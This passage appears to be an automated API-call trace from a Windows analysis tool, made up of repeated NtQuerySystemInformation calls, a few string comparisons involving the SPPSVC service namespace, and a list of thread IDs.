[0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefb0, Length=0x28, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x38, ResultLength=0x0) [0230.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x28, ResultLength=0x0) [0230.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x28, ResultLength=0x0) [0230.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x20, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x20, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x20, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x20, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x38, ResultLength=0x0) [0230.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x38, ResultLength=0x0) [0230.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff000, Length=0x20, ResultLength=0x0) [0230.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x20, ResultLength=0x0) [0230.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x20, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3d0, Length=0x50, ResultLength=0x0) [0230.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff350, Length=0x28, ResultLength=0x0) [0230.893] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3d0, Length=0x50, ResultLength=0x0) [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3d0, Length=0x50, ResultLength=0x0) [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3d0, Length=0x50, ResultLength=0x0) [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff300, Length=0x38, ResultLength=0x0) [0230.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x28, ResultLength=0x0) [0230.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x28, ResultLength=0x0) [0230.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x28, ResultLength=0x0) [0230.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x28, ResultLength=0x0) [0230.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff300, Length=0x38, ResultLength=0x0) [0230.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff220, Length=0x28, ResultLength=0x0) [0230.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff220, Length=0x28, ResultLength=0x0) [0230.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff300, Length=0x38, ResultLength=0x0) [0230.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x20, ResultLength=0x0) [0230.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x20, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x20, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x20, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff300, Length=0x38, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x20, ResultLength=0x0) [0230.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x20, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x20, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3d0, Length=0x50, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff350, Length=0x28, ResultLength=0x0) [0230.903] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3d0, Length=0x50, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3d0, Length=0x50, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3d0, Length=0x50, ResultLength=0x0) [0230.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff300, Length=0x38, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x28, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x28, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff130, Length=0x28, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a0, Length=0x28, ResultLength=0x0) [0230.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff300, Length=0x38, ResultLength=0x0) [0230.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff220, Length=0x28, ResultLength=0x0) [0230.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff220, Length=0x28, ResultLength=0x0) [0230.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff300, Length=0x38, ResultLength=0x0) [0230.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x20, ResultLength=0x0) [0230.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x20, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x20, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x20, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff300, Length=0x38, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x20, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x20, ResultLength=0x0) [0230.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x20, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff850, Length=0x48, ResultLength=0x0) [0232.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff850, Length=0x48, ResultLength=0x0) [0301.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 480 os_tid = 0x11e8 Thread: id = 481 os_tid = 0xe70 Thread: id = 482 os_tid = 0x11b4 Thread: id = 532 os_tid = 0x1130 Thread: id = 533 os_tid = 0x1124 [0221.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff1d0, Length=0x50, ResultLength=0x0) [0221.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff150, Length=0x28, ResultLength=0x0) [0221.934] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0221.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff1d0, Length=0x50, ResultLength=0x0) [0221.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff1d0, Length=0x50, ResultLength=0x0) [0221.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff1d0, Length=0x50, ResultLength=0x0) [0221.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x28, ResultLength=0x0) [0221.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x28, ResultLength=0x0) [0221.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x28, ResultLength=0x0) [0221.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fefa0, Length=0x28, ResultLength=0x0) [0221.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff020, Length=0x28, ResultLength=0x0) [0221.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff020, Length=0x28, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef80, Length=0x20, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef00, Length=0x20, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef00, Length=0x20, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef00, Length=0x20, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef80, Length=0x20, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff1d0, Length=0x50, ResultLength=0x0) [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff150, Length=0x28, ResultLength=0x0) [0221.945] _wcsicmp 